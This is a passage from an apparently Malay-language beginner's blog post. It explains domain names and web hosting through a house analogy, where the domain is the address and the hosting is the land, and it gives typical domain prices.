Nama Domain boleh dianggap seperti alamat rumah. Nama Domain ini anda boleh beli daripada mana-mana syarikat domain secara online. Nama Domain ini biasanya anda boleh dapati dengan harga dalam RM35 sehingga RM150 setahun. Domain ini adalah sangat penting untuk orang dapat melayari laman web anda. Jika anda tidak mempunyai domain seperti anda
membina rumah tanpa alamat. Tiada siapa akan datang atau sampai ke rumah anda. Contoh Nama Domain adalah seperti google.com yahoo.com facebook.com.

3. Web Hosting (Tapak Rumah)
Web Hosting boleh dianggap sebagai tanah atau tapak  rumah anda. Tanpa tapak, anda tidak boleh membina rumah. Oleh itu, anda mesti mempunyai Web Hosting jika anda ingin memiliki sebuah website. Web Hosting ini sebenarnya adalah merupakan sebuah komputer yang mempunyai sambungan internet 7 hari seminggu 24 jam sehari semalam dan orang ramai boleh akses kepadanya. Oleh itu, anda perlulah meletakkan website anda di Web Hosting supaya orang ramai dapat melayari website anda.

 Sekian Terima kasih
Cc to:Musa
google.com, pub-1921621716597010, DIRECT, f08c47fec0942fa0